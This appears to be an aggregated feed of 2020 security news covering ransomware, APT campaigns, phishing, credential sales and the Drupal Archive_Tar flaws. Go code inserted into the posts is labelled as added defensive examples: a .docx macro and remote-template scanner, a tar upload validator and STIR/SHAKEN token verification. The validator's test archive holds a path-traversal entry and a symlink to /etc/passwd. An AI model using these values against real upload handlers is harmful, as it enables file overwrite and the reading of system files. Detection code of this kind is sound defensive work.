In a new statement issued by Sopra Steria, the company confirmed that it has detected an attack involving the Ryuk ransomware on 21 October.

The internal cybersecurity staff rapidly blocked the threat, and the measures implemented allowed the company to contain the malware to only a limited part of the Group’s infrastructure.

“At this stage, Sopra Steria has not identified any leaked data or damage caused to its customers’ information systems.” states the company.

“The secure remediation plan launched on 26 October is nearly complete. Access has progressively been restored to workstations, R&D and production servers, and in-house tools and applications. Customer connections have also been gradually restored.”

“The remediation and differing levels of unavailability of the various systems since 21 October is expected to have a gross negative impact on the operating margin of between €40 million and €50 million. The Group’s insurance coverage for cyber risks totals €30 million.” the company added.

The IT services provider said that sales activity for the fourth quarter should not be significantly affected by this event.

Sopra Steria expects to see negative organic revenue growth of between 4.5% and 5.0% (previously ‘between -2% and -4%’) for the financial year 2020. The company also estimates an operating margin on business activity of around 6.5% (previously ‘between 6% and 7%’), and free cash flow of between €50 million and €100 million (previously ‘between €80m and €120m’).

Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)

The post Sopra Steria estimates financial Impact of ransomware attack could reach €50 Million appeared first on Security Affairs.

Operators behind Dark Caracal are still alive and operational

The Dark Caracal APT group has carried out a series of attacks against multiple sectors using a new variant of a 13-year-old backdoor Trojan.

The Dark Caracal cyberespionage group is back: researchers from Check Point uncovered a new series of attacks against multiple industries.

Dark Caracal is an APT group associated with the Lebanese General Directorate of General Security; in recent attacks it employed a new version of a 13-year-old backdoor Trojan dubbed Bandook.

Bandook was last seen in campaigns in 2015 and 2017, dubbed “Operation Manul” and “Dark Caracal” and attributed to the Kazakh and Lebanese governments respectively. This suggests that the implant was developed by a third-party actor and used by multiple APT groups.

“During this past year, dozens of digitally signed variants of this once commodity malware started to reappear in the threat landscape, reigniting interest in this old malware family.” reads the report published by Check Point.

“In the latest wave of attacks, we once again identified an unusually large variety of targeted sectors and locations. This further reinforces a previous hypothesis that the malware is not developed in-house and used by a single entity, but is part of an offensive infrastructure sold by a third party to governments and threat actors worldwide, to facilitate offensive cyber operations.”

During the last campaign, the hackers targeted multiple sectors, including government, financial, energy, food industry, healthcare, education, IT, and legal institutions.

The APT group targeted entities in Singapore, Cyprus, Chile, Italy, the USA, Turkey, Switzerland, Indonesia, and Germany.

The infection chain used in the attacks is constantly evolving; the following image shows its three main stages.

Dark Caracal malware-attack-flow

The first stage leverages a lure Microsoft Word document (e.g. “Certified documents.docx”) delivered inside a ZIP file. Upon opening the archive, malicious macros are downloaded, which then drop and execute a second-stage PowerShell script encrypted inside the original Word document.

In the last phase of the attack, the PowerShell script downloads encoded executable parts from legitimate cloud storage services such as Dropbox or Bitbucket, then assembles the Bandook loader, which injects the RAT into a new Internet Explorer process.

The Bandook RAT has been available on the underground market since 2007; it supports common backdoor commands, including capturing screenshots and carrying out various file-related operations.

Experts noticed that the new release of Bandook is a slimmed-down version of the original malware and supports only 11 of its 120 commands. Supporting only a subset of the commands suggests the threat actors are trying to stay under the radar.

Experts observed several samples of the malware that were digitally signed with valid certificates issued by Certum. Check Point researchers also spotted two digitally-signed and unsigned variants which they believe are operated by a single entity.
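The first stage described above is a macro-free lure document that only fetches its macros once it is opened. As an added defensive example (not code from Check Point or from the original post), the following Go program inspects a .docx package for the two indicators a mail gateway can check without rendering the file in Office: an embedded VBA project (word/vbaProject.bin) and an external attachedTemplate relationship pointing at a remote template. The remote-template mechanism is an assumption on my part; the post only says that the macros are downloaded. The sample document and its URL are constructed for the demonstration.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

const (
	relsNS               = "http://schemas.openxmlformats.org/package/2006/relationships"
	attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
	vbaProjectPart       = "word/vbaProject.bin" // only present in macro-enabled content
)

// relationships mirrors an OOXML .rels part; encoding/xml matches element names
// regardless of the default namespace declared on the root element.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// Findings is what a gateway scanner reports for one document.
type Findings struct {
	EmbeddedMacros  bool     // word/vbaProject.bin exists
	RemoteTemplates []string // external attachedTemplate targets (remote template injection)
	ExternalTargets []string // any other external relationship, worth a second look
}

// Suspicious says whether the document should be held for analysis.
func (f Findings) Suspicious() bool {
	return f.EmbeddedMacros || len(f.RemoteTemplates) > 0
}

// InspectDocx walks the OOXML package (a ZIP) without rendering it.
func InspectDocx(data []byte) (Findings, error) {
	var f Findings
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil {
		return f, fmt.Errorf("not an OOXML package: %w", err)
	}
	for _, part := range zr.File {
		if part.Name == vbaProjectPart {
			f.EmbeddedMacros = true
		}
		if !strings.HasSuffix(part.Name, ".rels") {
			continue
		}
		rc, err := part.Open()
		if err != nil {
			return f, err
		}
		raw, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return f, err
		}
		var rels relationships
		if err := xml.Unmarshal(raw, &rels); err != nil {
			return f, fmt.Errorf("%s: %w", part.Name, err)
		}
		for _, r := range rels.Rels {
			switch {
			case r.TargetMode != "External": // internal part reference, nothing to flag
			case r.Type == attachedTemplateType:
				f.RemoteTemplates = append(f.RemoteTemplates, r.Target)
			default:
				f.ExternalTargets = append(f.ExternalTargets, r.Target)
			}
		}
	}
	return f, nil
}

// BuildSampleDocx constructs a minimal package for testing (constructed, not a real lure).
// With a non-empty templateURL, word/_rels/settings.xml.rels points at a remote template,
// which is how a macro-free .docx can still pull macros from the network when opened.
func BuildSampleDocx(templateURL string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	write := func(name, body string) {
		w, _ := zw.Create(name)
		w.Write([]byte(body))
	}
	write("_rels/.rels", `<Relationships xmlns="`+relsNS+`"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>`)
	write("word/document.xml", `<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`)
	if templateURL != "" {
		write("word/_rels/settings.xml.rels", `<Relationships xmlns="`+relsNS+`"><Relationship Id="rId1" Type="`+attachedTemplateType+`" Target="`+templateURL+`" TargetMode="External"/></Relationships>`)
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	for _, u := range []string{"", "http://template.example.invalid/doc.dotm"} { // constructed URL
		f, err := InspectDocx(BuildSampleDocx(u))
		fmt.Printf("template=%q suspicious=%v err=%v %+v\n", u, f.Suspicious(), err, f)
	}
}
```

The check is cheap enough to run on every inbound attachment, including ones extracted from ZIP files, and it catches the "no macros inside, yet macros run" pattern that a plain vbaProject.bin scan misses.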

“Some of this campaign’s characteristics and similarities to previous campaigns leads us to believe that the activity we describe in this report is indeed the continuation and evolution of the infrastructure used during the Dark Caracal operation:

  • The use of the same certificate provider (Certum) throughout the various campaigns.
  • The use of the Bandook Trojan, in what appears to be a unique evolving fork from the same source code (which is not known to be publicly available). Samples from the Dark Caracal campaign (2017) utilized around 100 commands, compared to the current 120 command version we analyzed.
  • This wave of attacks shares the same anomalous characteristics for targeted attacks – an extreme variance in the selected targets, both in their industry and their geographic spread.” concluded the experts.

“All evidence points to our belief that the mysterious operators behind the malicious infrastructure of “Operation Manul” and “Dark Caracal” are still alive and operational, willing to assist in the offensive cyber operations to anyone who is willing to pay.”

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Operators behind Dark Caracal are still alive and operational appeared first on Security Affairs.

Week in review: Drupal-based sites open to attack, cPanel 2FA bypass vulnerability

Here’s an overview of some of last week’s most interesting news and articles: Challenges organizations face in combating third-party cyber risk A CyberGRX report reveals trends and challenges organizations of all sizes face in combating third-party cyber risk today. Each insight was gleaned from proprietary assessment data gathered from a sample of 4,000 third parties. cPanel 2FA bypass vulnerability can be exploited through brute force A two-factor authentication (2FA) bypass vulnerability affecting the popular cPanel … More

The post Week in review: Drupal-based sites open to attack, cPanel 2FA bypass vulnerability appeared first on Help Net Security.

Weekly Update 219: IoT Unravelled with Scott Helme


What. A. Week. Blog post every day, massive uptick in comments, DMs, newsletter subscribers, followers and especially, blog traffic. More than 200,000 unique visitors dropped by this week, mostly to read about IoT things. This has been a fascinating experience for me and I've enjoyed sharing the journey, complete with all my mistakes 🙂 I topped the week off by spending a couple of hours talking to Scott Helme about our respective IoT experiences so that's the entirety of this week's update - Scott and I talking IoT. I hope you enjoy this temporary change in programming so here it is, the IoT unravelled livestream with Scott:


References

  1. IoT Unravelled Part 1: It's a Mess... But Then There's Home Assistant
  2. IoT Unravelled Part 2: IP Addresses, Network, Zigbee, Custom Firmware and Soldering
  3. IoT Unravelled Part 3: Security
  4. IoT Unravelled Part 4: Making it All Work for Humans
  5. IoT Unravelled Part 5: Practical Use Case Videos
  6. Sponsored by: 1Password is a secure password manager and digital wallet that keeps you safe online

Chip maker Advantech hit by Conti ransomware gang

The IIoT chip maker Advantech was hit by the Conti ransomware; the gang is now demanding a ransom of over $13 million from the company.

The Conti ransomware gang infected the systems of industrial automation and Industrial IoT (IIoT) chip maker Advantech and is demanding a ransom of over $13 million (roughly 750 BTC) to avoid leaking stolen files and to provide a key to restore the encrypted files.

Advantech has 8,000 employees worldwide and has reported a yearly sales revenue of over $1.7 billion in 2019.

On November 21, 2020, the ransomware gang announced that it would leak the stolen data if the chipmaker did not pay the ransom within the next day.

As proof of the capability to restore the data, Conti ransomware operators are willing to decrypt two of the encrypted files.

On November 26, the ransomware operators began leaking the data stolen from Advantech, an archive of 3.03GB that accounts for 2% of the total amount of stolen data.

According to Bleeping Computer, the Conti ransomware gang also promised to remove any backdoors from the company’s network after the payment of the ransom. The operators also announced that the stolen data would be permanently removed from their servers and that they would provide security tips on how to secure the network to prevent future infections.

Conti ransomware operators run a private Ransomware-as-a-Service (RaaS); the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections.

Since August 2020, the group has operated a leak site used to threaten its victims with the release of stolen data.

Pierluigi Paganini

(SecurityAffairs – hacking, Advantech)

The post Chip maker Advantech hit by Conti ransomware gang appeared first on Security Affairs.

Office 365 phishing campaign leverages Oracle and Amazon cloud services

Experts warn of a new sophisticated phishing scheme for stealing Office 365 credentials from small and medium-sized businesses in the U.S.

Threat actors implemented the new phishing scheme to steal Office 365 credentials; it leverages cloud services from both Oracle and Amazon for its infrastructure.

The campaign has been active for more than half a year and targeted small and medium-sized businesses in the U.S. and Australia.

The threat actors compromised legitimate websites and used them as a proxy chain. The campaign also stands out for its abuse of legitimate services and websites for data exfiltration.

The phishing messages are fake voice-message notifications and Zoom invitations designed to trick victims into clicking an embedded link, which ultimately leads to a phishing page built to steal login credentials.

Office 365 phishing (source: Bleeping Computer)

According to cybersecurity firm Mitiga, the threat actors used compromised accounts to send out phishing messages and used Amazon Web Services (AWS) and Oracle Cloud in the redirect chain.

“Once the link was clicked, the user is redirected through several proxies, including AWS load balancers, all the way to a legitimate but compromised website” Ofir Rozmann, threat intelligence at Mitiga told Bleeping Computer.

Before victims reach the final landing page, they are redirected through several proxies, including AWS load balancers.

Most of the fake Office 365 login pages were hosted on Oracle Cloud computing service, but experts also observed the use of Amazon Simple Storage Service (Amazon S3).

Mitiga researchers discovered more than 40 compromised websites that were employed in this Office 365 phishing campaign.

The analysis of the HTML code of the fake Office 365 pages suggests that the attackers opted for a phishing-as-a-service offering.

Based on the email addresses employed in this campaign, Mitiga researchers determined that the campaign mainly aimed at C-level executives at small and medium-sized businesses as well as major financial institutions.

Additional technical details about this campaign, along with Mitiga recommendations to avoid falling victim to these attacks are reported here.

Pierluigi Paganini

(SecurityAffairs – hacking, Office 365)

The post Office 365 phishing campaign leverages Oracle and Amazon cloud services appeared first on Security Affairs.

CISA Warns of Password Leak on Vulnerable Fortinet VPNs

Agency Says Hackers Can Use a Known Bug for Further Exploitation
CISA is warning about a possible password leak that could affect vulnerable Fortinet VPNs and lead to further exploitation. The latest agency notice comes just days after hackers began publishing what they claim are leaked passwords on underground forums, according to researchers.

Is AliExpress Safe? The Answer Might Surprise You

Is AliExpress Safe? A Brief History of Online Shopping  According to ODM World, online shopping refers to a “unique form of electronic commerce (known as eCommerce) which connects customers and sellers on all corners of the internet with the use of a web browser. […] there are two forms an online shop could take. First […]

The post Is AliExpress Safe? The Answer Might Surprise You appeared first on Heimdal Security Blog.

Hundreds of C-level executives credentials available for $100 to $1500 per account

A credible threat actor is offering access to the email accounts of hundreds of C-level executives for $100 to $1500 per account.

Access to the email accounts of hundreds of C-level executives is available on Exploit.in for $100 to $1500 per account. Exploit.in is a popular closed-access underground forum for Russian-speaking hackers, and it isn’t the only one: other prominent forums are fuckav.ru, Blackhacker, Omerta, and L33t.

The news reported by ZDNet is not surprising; I have come across this kind of offer several times, but it is important to raise awareness of the cybercrime-as-a-service model that could rapidly enable threat actors to carry out malicious activities.

The availability of access to the email accounts of C-level executives could allow threat actors to carry out multiple malicious activities, from cyber espionage to BEC scams.

The threat actor is selling login credentials for Office 365 and Microsoft accounts and the price depends on the size of the C-level executives’ companies and the internal role of the executive.

The threat actor claims its database includes login credentials of high-level executives such as:

  • CEO – chief executive officer
  • COO – chief operating officer
  • CFO – chief financial officer or chief financial controller
  • CMO – chief marketing officer
  • CTO – chief technology officer
  • President
  • Vice president
  • Executive Assistant
  • Finance Manager
  • Accountant
  • Director
  • Finance Director
  • Financial Controller
  • Accounts Payables

ZDNet confirmed the authenticity of some of the data available for sale.

“A source in the cyber-security community who agreed to contact the seller to obtain samples has confirmed the validity of the data and obtained valid credentials for two accounts, the CEO of a US medium-sized software company and the CFO of an EU-based retail store chain.” reported ZDNet.

At the time of writing, it is unclear how the threat actor has obtained the login credentials.

Experts from threat intelligence firm KELA speculate that the threat actor could have obtained the credentials by buying “Azor logs,” lots of data stolen from computers infected with the AzorUlt info-stealer trojan.

Data collected by info-stealers are sold in the underground; threat actors buy and parse them in search of sensitive data such as account credentials.

In July, the US Department of Justice indicted a hacker who goes online by the moniker Fxmsp for hacking over three hundred organizations worldwide and selling access to their networks.

Once the hacker gained access to the network, they deployed password-stealing malware and remote access trojans (RATs) to harvest credentials and establish persistence in the system.

The name Fxmsp refers to a high-profile Russian- and English-speaking hacking group focused on breaching high-profile private corporate and government networks.

Since March 2019, Fxmsp announced in cybercrime forums the availability of information stolen from major antivirus companies located in the U.S.

Between 2017 and 2018, Fxmsp created a network of trusted proxy resellers to promote their breaches on the criminal underground.

Fxmsp typically compromised the Active Directory of target organizations and ensured external access through remote desktop protocol (RDP) connections.

Turchin attempted to sell access to these networks on hacker forums (i.e. Exploit.in, fuckav.ru, Club2Card, Altenen, Blackhacker, Omerta, Sniff3r, and L33t) and dark web marketplaces for prices ranging from a few thousand dollars up to over $100,000.

The group also claimed to have developed a credential-stealing botnet capable of infecting high-profile targets and exfiltrating sensitive data, including access credentials.


In 2019, Fxmsp confirmed that it had breached the networks of some security companies and obtained long-term access.

The group offered access to single companies for $250,000 and is asking $150,000 for the source code of the software. Buyers can also pay at least $300,000 to acquire both, the price depends on the compromised company.

Pierluigi Paganini

(SecurityAffairs – hacking, executive)

The post Hundreds of C-level executives credentials available for $100 to $1500 per account appeared first on Security Affairs.

Drupal emergency updates fix critical arbitrary PHP code execution

Drupal has released emergency security updates to fix a critical flaw with known exploits that could allow for arbitrary PHP code execution.

Drupal has released emergency security updates to address a critical vulnerability with known exploits that could be exploited to achieve arbitrary PHP code execution on some CMS versions.

The Drupal project uses the PEAR Archive_Tar library, which was recently updated to address CVE-2020-28948 and CVE-2020-28949.

As a consequence, multiple vulnerabilities affect Drupal installs that are configured to allow .tar, .tar.gz, .bz2, or .tlz file uploads and process them.

“Drupal has released security updates to address vulnerabilities in Drupal 7, 8.8 and earlier, 8.9, and 9.0. An attacker could exploit this vulnerability to take control of an affected system.” reads the advisory published by CISA.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Drupal Advisory SA-CORE-2020-013 and apply the necessary updates.”

“According to the regular security release window schedule, November 25th would not typically be a core security window,” reads the security advisory published by Drupal.

“However, this release is necessary because there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.”

Drupal released the following updates to address the issues:

“Versions of Drupal 8 prior to 8.8.x are end-of-life and do not receive security coverage,” Drupal’s security team added.

Drupal also recommends mitigating the issue by preventing untrusted users from uploading .tar, .tar.gz, .bz2, or .tlz files.

The number of vulnerable Drupal installs is estimated at over 940,000 out of a total of 1,120,94.

Last week, the Drupal development team released security updates to fix a remote code execution vulnerability caused by the failure to properly sanitize the names of uploaded files.
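Drupal’s recommended workaround is to refuse the archive types outright. Where uploads of archives must stay enabled, the archive can at least be screened before any extraction library touches it. The following Go program is an added example, not Drupal or PEAR code: it walks a tar stream and refuses the entries no web upload should contain (absolute paths, “..” traversal, symlinks and hard links, device nodes or other special types, backslashes and NUL bytes in names). It is a generic pre-extraction check, not a reproduction of the actual exploits, which the advisory does not describe; the archive it checks is constructed inline.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"path"
	"strings"
)

// ValidateTar reads a tar stream and lists every entry that must not be extracted
// under a web root. An empty result means every entry is a plain file or directory
// whose path stays inside the extraction directory.
func ValidateTar(r io.Reader) ([]string, error) {
	var problems []string
	tr := tar.NewReader(r)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return problems, nil
		}
		if err != nil {
			return problems, fmt.Errorf("malformed archive: %w", err)
		}
		if reason := checkEntry(hdr); reason != "" {
			problems = append(problems, hdr.Name+": "+reason)
		}
	}
}

// ValidateTarBytes is a convenience wrapper for in-memory uploads.
func ValidateTarBytes(data []byte) ([]string, error) {
	return ValidateTar(bytes.NewReader(data))
}

// checkEntry returns an empty string for an acceptable entry, otherwise the reason
// it is refused. Type is checked first: links can point anywhere on the filesystem.
func checkEntry(hdr *tar.Header) string {
	switch hdr.Typeflag {
	case tar.TypeReg, tar.TypeDir:
	case tar.TypeSymlink, tar.TypeLink:
		return "link entry refused (target " + hdr.Linkname + ")"
	default:
		return fmt.Sprintf("unsupported entry type %q", hdr.Typeflag)
	}
	name := hdr.Name
	if strings.ContainsAny(name, "\\\x00") {
		return "backslash or NUL byte in name"
	}
	if strings.HasPrefix(name, "/") {
		return "absolute path"
	}
	// path.Clean collapses "a/../b" to "b"; anything still starting with ".." escapes.
	if clean := path.Clean(name); clean == ".." || strings.HasPrefix(clean, "../") {
		return "path traversal"
	}
	return ""
}

// BuildSampleTar constructs a test archive (constructed data, not a real upload) with one
// harmless file, one traversal entry and one symlink aimed outside the extraction dir.
func BuildSampleTar() []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	add := func(hdr *tar.Header, body string) {
		hdr.Size = int64(len(body))
		tw.WriteHeader(hdr)
		io.WriteString(tw, body)
	}
	add(&tar.Header{Name: "docs/readme.txt", Mode: 0o644, Typeflag: tar.TypeReg}, "harmless")
	add(&tar.Header{Name: "../../outside.php", Mode: 0o644, Typeflag: tar.TypeReg}, "placeholder")
	add(&tar.Header{Name: "settings.php", Linkname: "/etc/passwd", Typeflag: tar.TypeSymlink}, "")
	tw.Close()
	return buf.Bytes()
}

func main() {
	problems, err := ValidateTarBytes(BuildSampleTar())
	fmt.Println(err, problems)
}
```

Run the validator on the uploaded bytes before handing them to the extraction code, and reject the whole upload on the first problem rather than skipping the bad entries: an archive that contains a traversal entry was not produced by a well-behaved tool.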

The vulnerability, tracked as CVE-2020-13671, has been classified as critical according to the NIST Common Misuse Scoring System.

The flaw could be exploited by an attacker by uploading files with certain types of extensions (phar, php, pl, py, cgi, html, htm, phtml, js, and asp) to the server to achieve remote code execution.

Pierluigi Paganini

(SecurityAffairs – hacking, PHP code execution)

The post Drupal emergency updates fix critical arbitrary PHP code execution appeared first on Security Affairs.

Rebooting the Office

Employers face not only the challenge of developing a plan to safely reopen the office. They must also begin to reimagine the future of work in this new environment. In short, it is time to “reboot” the office. The reboot will affect everything, not just physical office space, but also technology, people and policies. It…

The post Rebooting the Office first appeared on IT World Canada.

Cyber Security Today Week In Review for November 27, 2020

The holiday shopping period is upon us with Black Friday officially starting today. Why not get a security-related gift? Guest analyst Dinah Davis of Arctic Wolf and I discuss what's available in books, software and stocking-stuffers

The post Cyber Security Today Week In Review for November 27, 2020 first appeared on IT World Canada.

Out-of-band Drupal security updates fix bugs with known exploits

Drupal has released out-of-band security updates to fix two critical code execution flaws (CVE-2020-28948, CVE-2020-28949) in Drupal core, as “there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.” The vulnerabilities CVE-2020-28948 and CVE-2020-28949 are arbitrary PHP code execution vulnerabilities found in the open source PEAR Archive_Tar library, which Drupal uses to handle TAR files in PHP. “(The) vulnerabilities are possible if Drupal is configured to allow … More

The post Out-of-band Drupal security updates fix bugs with known exploits appeared first on Help Net Security.

North Korean hackers allegedly behind cyberattacks on AstraZeneca

The Reuters agency revealed in an exclusive that the COVID vaccine maker AstraZeneca was targeted by alleged North Korea-linked hackers.

According to a report published by Reuters, suspected North Korea-linked hackers targeted AstraZeneca, one of the companies that are developing a COVID vaccine.

The attack attempts took place in recent weeks, two people with knowledge of the matter told Reuters. The attackers used a well-known tactic: they posed as recruiters on popular social networks and instant messaging applications, including LinkedIn and WhatsApp, to approach AstraZeneca employees with fake job offers.

“They then sent documents purporting to be job descriptions that were laced with malicious code designed to gain access to a victim’s computer.” reported Reuters. “The hacking attempts targeted a “broad set of people” including staff working on COVID-19 research, said one of the sources, but are not thought to have been successful.”

Pyongyang has always denied carrying out cyberattacks on healthcare organizations and entities involved in the development of a vaccine.

The attribution to North Korea is based on the analysis of the tools and techniques used in the attacks, which overlap significantly with an ongoing hacking campaign that U.S. officials and cybersecurity researchers have attributed to North Korea.

According to the experts, the same campaign also aimed at defence companies, media organisations, and COVID-related targets, such as vaccine scientists and drugmakers.

A report recently published by the Canadian Centre for Cyber Security, titled “National Cyber Threat Assessment 2020,” warns of risks associated with state-sponsored operations from China, Russia, Iran, and North Korea.

Nation-state actors linked to the above countries pose the greatest strategic threats to Canada and according to the report, they will continue to attempt to steal Canadian intellectual property, especially related to COVID-19.

Threat actors are carrying out cyber espionage campaigns and online influence campaigns.

South Korean lawmakers announced last week that the country’s intelligence agency had foiled cyber attacks.

Reuters added that some of the accounts employed in the attacks on AstraZeneca were registered to Russian email addresses, but one of the sources speculated that it could be a false flag used by the attackers.

At the time of writing, AstraZeneca declined to comment.

Pierluigi Paganini

(SecurityAffairs – hacking, AstraZeneca)

The post North Korean hackers allegedly behind cyberattacks on AstraZeneca appeared first on Security Affairs.

SHAKE them and STIR them: how Canada is fighting scam calls

Scam calls suck. In 2019 alone, 26 billion illegal robocalls and scam calls eroded subscribers’ faith in telephone service worldwide, an increase of 18 per cent year over year. In many cases, vampiric scammers hunted people’s wallets. Between January and October 2019, they stole $24 million from Canadians.

Fraud and anti-spam laws set harsh punishments for criminals, but they can only be enforced after the damage has been done. Netting the perps is even harder. Therefore, these calls must be stopped before they reach the receiver.

Amid the swelling volume of spam calls, the world raced to find a defence. In Canada and the United States, STIR/SHAKEN has been selected as the best candidate. With a name inspired by James Bond’s famed quote, STIR/SHAKEN will be the first antidote to curing the spam call plague.

Key terms:

  • STIR: Secure Telephony Identity Revisited, the standard developed by the IETF that defines signature-based call authentication.
  • SHAKEN: Signature-based Handling of Asserted information using toKENs, the framework for implementing STIR.

However, before discussing STIR/SHAKEN’s implementation, it’s important to understand the two popular telephone network protocols.

TDM vs SIP telephone networks

Historically, calls were made over the Public Switched Telephone Network (PSTN), a term that persists to describe the plain old telephone service. Old films often show operators swapping wires on a switchboard to route a call; these depict the circuit-switched system. Eventually, the invention of the SS7 protocol set and time-division multiplexing (TDM) in 1975 retired the human operators.

The TDM-based system was superior to human operators in that it could carry many calls over a single wire, consolidating hundreds of cables into dedicated connections. It achieved this by switching between calls so quickly that the gaps between voices were imperceptible. Its high reliability and simple implementation would dominate the phone industry for the next 50 years. But in the 21st century, demand for richer call services has exceeded TDM’s capabilities.

After much scouring, the industry settled on the session initiation protocol (SIP). The SIP protocol is a part of voice-over IP (VoIP) technology and operates over the internet as opposed to TDM’s specialized telephone hardware. Phone operators valued the SIP network’s reliability, cheaper hardware, the potential for new services, multimedia support, and better management capabilities. Its flexibility enabled STIR/SHAKEN, the upcoming hero in thwarting spoofed calls.

How STIR/SHAKEN works

The principle behind STIR/SHAKEN is based on digital signatures, an established technology that’s almost as old as the internet.

SHAKEN authentication over a SIP interconnect is trivial. When the caller makes a call, the SHAKEN Authentication module appends a digitally signed token to the call invite before passing it through the SIP interconnect. Once the invite reaches the receiver, the SHAKEN verification system qualifies the token and delivers/blocks the call. This simple system makes number spoofing exponentially harder.

STIR has been around since 2013.

But there’s a catch: these tokens cannot be transmitted over legacy networks, which carry 85 per cent of all robocalls. This is because the tokens are dropped at the first SIP-to-TDM conversion. When the terminating STIR verification system does not see a token, it simply drops the invite. This is the largest roadblock to establishing STIR/SHAKEN in Canada, as most operators use a mix of both systems.
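The signing and verification described above, as an added example in Go (not code from TransNexus, the CST-GA or any carrier). It builds the PASSporT token that SHAKEN carries in the SIP Identity header, signs it with ES256 as the originating provider’s authentication service would, and verifies it on the terminating side, including the failure case just mentioned: an empty token, as left behind after a SIP-to-TDM hop, is rejected rather than trusted. Assumptions: the terminating verifier is handed the originating provider’s public key directly (a real deployment fetches the certificate named by x5u and validates it against the STI-CA policy, which is out of scope here), and the phone numbers, certificate URL and origid used in the test are constructed values.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"math/big"
	"strings"
	"time"
)

// PASSporT (RFC 8225) with the SHAKEN extension (RFC 8588): the header names the
// signing certificate (x5u); the claims bind the originating and destination
// numbers to a timestamp and an attestation level (A, B or C).
type passportHeader struct {
	Alg string `json:"alg"`
	Ppt string `json:"ppt"`
	Typ string `json:"typ"`
	X5u string `json:"x5u"`
}

type passportClaims struct {
	Attest string              `json:"attest"`
	Dest   map[string][]string `json:"dest"`
	Iat    int64               `json:"iat"`
	Orig   map[string]string   `json:"orig"`
	OrigID string              `json:"origid"`
}

var b64 = base64.RawURLEncoding

// NewCarrierKey stands in for the private key behind a carrier's STI certificate.
func NewCarrierKey() (*ecdsa.PrivateKey, error) {
	return ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
}

// SignPassport is the originating provider's authentication step: it returns the
// compact JWS (header.claims.signature) placed in the SIP INVITE's Identity header.
func SignPassport(key *ecdsa.PrivateKey, certURL, origTN, destTN, attest, origID string, iat time.Time) (string, error) {
	h, _ := json.Marshal(passportHeader{Alg: "ES256", Ppt: "shaken", Typ: "passport", X5u: certURL})
	c, _ := json.Marshal(passportClaims{Attest: attest, Dest: map[string][]string{"tn": {destTN}},
		Iat: iat.Unix(), Orig: map[string]string{"tn": origTN}, OrigID: origID})
	signingInput := b64.EncodeToString(h) + "." + b64.EncodeToString(c)
	digest := sha256.Sum256([]byte(signingInput))
	r, s, err := ecdsa.Sign(rand.Reader, key, digest[:])
	if err != nil {
		return "", err
	}
	sig := make([]byte, 64) // JWS ES256 encodes r||s as two fixed 32-byte values, not ASN.1
	r.FillBytes(sig[:32])
	s.FillBytes(sig[32:])
	return signingInput + "." + b64.EncodeToString(sig), nil
}

// VerifyPassport is the terminating provider's check. It returns the attestation
// level, or an error when the token is missing, malformed, wrongly signed, stale,
// or bound to numbers other than the ones the call actually carries.
func VerifyPassport(token string, pub *ecdsa.PublicKey, origTN, destTN string, now time.Time, maxAge time.Duration) (string, error) {
	if token == "" {
		return "", errors.New("no Identity token (dropped at a SIP-to-TDM conversion?)")
	}
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return "", errors.New("malformed token")
	}
	hb, errH := b64.DecodeString(parts[0])
	cb, errC := b64.DecodeString(parts[1])
	sb, errS := b64.DecodeString(parts[2])
	if errH != nil || errC != nil || errS != nil || len(sb) != 64 {
		return "", errors.New("bad token encoding")
	}
	var hdr passportHeader
	var claims passportClaims
	if json.Unmarshal(hb, &hdr) != nil || json.Unmarshal(cb, &claims) != nil {
		return "", errors.New("bad token JSON")
	}
	if hdr.Alg != "ES256" || hdr.Ppt != "shaken" {
		return "", errors.New("unexpected alg or ppt")
	}
	digest := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	r, s := new(big.Int).SetBytes(sb[:32]), new(big.Int).SetBytes(sb[32:])
	if !ecdsa.Verify(pub, digest[:], r, s) {
		return "", errors.New("signature does not verify against the certificate key")
	}
	if age := now.Sub(time.Unix(claims.Iat, 0)); age < -maxAge || age > maxAge {
		return "", errors.New("token outside the freshness window (replayed or clock skew)")
	}
	destOK := false
	for _, tn := range claims.Dest["tn"] {
		destOK = destOK || tn == destTN
	}
	if claims.Orig["tn"] != origTN || !destOK {
		return "", errors.New("token numbers do not match the call")
	}
	return claims.Attest, nil
}
```

The number binding is the part that defeats caller-ID spoofing: a token is only useful for the originating and destination numbers it names, and a token for a different originating number fails verification even though its signature is perfectly valid. The freshness window guards against replaying a captured token, and a missing token maps to the "dropped invite" behaviour the article describes.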


The solution is out-of-band (OOB) STIR/SHAKEN. It hands the token to a call placement service (CPS) before the network conversion, removing it from the call path, and sends it to the destination over the internet instead. Once received, the authentication server matches the call invite with the token at the destination and begins the verification process. This small change bypasses the barriers between mixed network types.

Out-of-Band STIR/SHAKEN bypasses telephone network changes.

For operators with SIP networks, OOB STIR/SHAKEN is turnkey-esque. Operators that exclusively use TDM switches can upgrade to SIP hardware using inexpensive off-the-shelf parts. For situations where that’s impossible, operators can use an ISUP to SIP gateway.

